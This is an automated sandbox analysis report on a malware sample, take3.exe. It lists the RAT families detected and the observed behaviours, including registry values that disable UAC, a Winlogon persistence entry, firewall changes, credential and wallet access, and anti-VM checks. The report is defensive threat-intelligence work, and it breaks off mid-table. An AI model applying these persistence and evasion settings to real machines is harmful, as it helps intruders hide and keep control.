Analysis Overview
SHA256
9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53
Threat Level: Known bad
The file take3.exe was found to be: Known bad.
Malicious Activity Summary
AmmyyAdmin payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Njrat family
Ammyy Admin
Quasar payload
Modifies WinLogon for persistence
Lokibot family
FlawedAmmyy RAT
Ammyyadmin family
Lokibot
Flawedammyy family
Modifies firewall policy service
UAC bypass
Quasar family
njRAT/Bladabindi
Quasar RAT
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Sets file to hidden
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Uses browser remote debugging
Modifies Windows Firewall
Executes dropped EXE
Checks BIOS information in registry
Identifies Wine through registry keys
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Drops startup file
Reads data files stored by FTP clients
Unsecured Credentials: Credentials In Files
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Accesses Microsoft Outlook profiles
Checks installed software on the system
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
UPX packed file
Drops file in Program Files directory
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
Program crash
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Access Token Manipulation: Create Process with Token
Browser Information Discovery
System Location Discovery: System Language Discovery
Detects Pyinstaller
NSIS installer
Views/modifies file attributes
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
outlook_win_path
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies data under HKEY_USERS
System policy modification
Runs ping.exe
Delays execution with timeout.exe
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Suspicious use of WriteProcessMemory
Gathers network information
Opens file in notepad (likely ransom note)
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-28 01:53
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-28 01:53
Reported
2024-11-28 01:56
Platform
win7-20241023-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
| PID 2908 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
| PID 2908 wrote to memory of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI29082\python311.dll
| MD5 | 9a24c8c35e4ac4b1597124c1dcbebe0f |
| SHA1 | f59782a4923a30118b97e01a7f8db69b92d8382a |
| SHA256 | a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7 |
| SHA512 | 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-28 01:53
Reported
2024-11-28 01:56
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Ammyy Admin
AmmyyAdmin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Ammyyadmin family
FlawedAmmyy RAT
Flawedammyy family
Lokibot
Lokibot family
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\Windows Security Health Host.exe," | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\seetrol\client\SeetrolClient.exe = "C:\\Program Files (x86)\\seetrol\\client\\SeetrolClient.exe:*:Enabled:SeetrolClient" | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4312 created 3488 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
njRAT/Bladabindi
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\file.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs | C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Downloads\UrlHausFiles\client.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1864 set thread context of 3808 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe |
| PID 1864 set thread context of 3976 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe |
| PID 1864 set thread context of 3140 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe |
| PID 4312 set thread context of 4272 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe |
| PID 4272 set thread context of 6976 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\STClientChat.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\dtph.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\Uninstall.cmd | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\068\dfmirage.dll | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\x64\dfmirage.dll | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\068\dfmirage.sys | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\dfmirage.inf | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\sas.dll | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolMyService.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolClient.cfg | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\MirrInst64.exe | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\068\dfmirage.cat | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\068\dfmirage.inf | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\x86\dfmirage.sys | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\sthooks.dll | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\STUpdate.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\x64\dfmirage.sys | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\mdph.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\MirrInst32.exe | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\Install.cmd | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\dfmirage.cat | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\105\x86\dfmirage.dll | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Music\Windows Security Health Host.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\file.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\ew.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\unik.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\client.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
